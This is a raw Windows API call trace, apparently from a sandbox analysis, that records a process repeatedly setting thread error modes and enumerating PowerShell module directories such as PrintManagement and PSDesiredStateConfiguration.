	[0047.045] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.045] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.045] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.047] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.047] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.047] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.047] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.047] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.049] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.049] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.052] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.055] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.055] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.055] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.056] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0047.056] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.056] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.056] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.056] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.057] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.058] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.058] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.059] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.061] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.061] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.061] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.062] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.062] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.062] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.063] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.063] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.064] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.064] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.065] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.067] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.068] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkConnectivityStatus\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7b00
	[0047.069] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.069] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.069] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.069] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.069] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.070] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.070] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.072] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.074] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.074] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.074] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.075] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.075] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.075] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.075] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.075] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.076] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.077] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.089] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.093] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.093] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.093] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.095] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.095] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.095] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.095] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.095] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.097] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.097] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.102] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.102] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.103] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PcsvDevice\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PcsvDevice\\", lpFilePart=0x0) returned 0x3e
	[0047.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.103] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.103] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.105] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.107] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.107] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.107] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.108] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.109] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.111] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.114] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.114] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.114] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.115] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.115] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.298] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PrintManagement", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PrintManagement", lpFilePart=0x0) returned 0x42
	[0047.299] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.299] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PrintManagement" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\printmanagement"), fInfoLevelId=0x0, lpFileInformation=0x184c18ddc0 | out: lpFileInformation=0x184c18ddc0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6350b6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6350b6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0047.299] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.299] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.299] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PrintManagement", nBufferLength=0x105, lpBuffer=0x184c18d800, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PrintManagement", lpFilePart=0x0) returned 0x42
	[0047.299] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PrintManagement\\", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PrintManagement\\", lpFilePart=0x0) returned 0x43
	[0047.299] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PrintManagement\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab7320
	[0047.300] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.300] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.300] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.303] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.303] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.303] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.303] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.303] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.303] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.303] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.304] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.304] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.304] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.304] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.304] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.304] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.304] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.304] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.304] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.304] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.305] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.305] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.305] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.305] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.305] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.305] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.305] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.305] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.305] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.305] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.306] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.306] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.306] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.306] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.306] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0047.306] FindClose (in: hFindFile=0x1505fab7320 | out: hFindFile=0x1505fab7320) returned 1
	[0047.307] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.307] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.307] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PrintManagement\\PrintManagement.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\printmanagement\\printmanagement.psd1")) returned 0x20
	[0047.315] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.315] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDesiredStateConfiguration", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDesiredStateConfiguration", lpFilePart=0x0) returned 0x4e
	[0047.315] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDesiredStateConfiguration\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDesiredStateConfiguration\\", lpFilePart=0x0) returned 0x4f
	[0047.315] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDesiredStateConfiguration\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab8340
	[0047.317] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.317] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.317] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.317] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.317] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.317] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.317] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.318] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.318] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.318] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.318] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.318] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.318] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.318] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.318] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.318] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.319] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.319] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.319] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0047.319] FindClose (in: hFindFile=0x1505fab8340 | out: hFindFile=0x1505fab8340) returned 1
	[0047.319] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.319] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.319] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.319] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDesiredStateConfiguration", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDesiredStateConfiguration", lpFilePart=0x0) returned 0x4e
	[0047.319] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDesiredStateConfiguration\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDesiredStateConfiguration\\", lpFilePart=0x0) returned 0x4f
	[0047.320] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDesiredStateConfiguration\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7bc0
	[0047.320] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.320] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.320] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.321] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.321] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.321] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.321] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.321] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.321] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.321] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.321] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.321] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.321] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.321] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.322] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.322] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.322] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.322] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.322] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0047.322] FindClose (in: hFindFile=0x1505fab7bc0 | out: hFindFile=0x1505fab7bc0) returned 1
	[0047.323] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.323] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.323] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDesiredStateConfiguration", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDesiredStateConfiguration", lpFilePart=0x0) returned 0x4e
	[0047.323] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.323] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDesiredStateConfiguration" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdesiredstateconfiguration"), fInfoLevelId=0x0, lpFileInformation=0x184c18ddc0 | out: lpFileInformation=0x184c18ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0047.323] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.323] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.323] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDesiredStateConfiguration", nBufferLength=0x105, lpBuffer=0x184c18d800, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDesiredStateConfiguration", lpFilePart=0x0) returned 0x4e
	[0047.323] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDesiredStateConfiguration\\", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDesiredStateConfiguration\\", lpFilePart=0x0) returned 0x4f
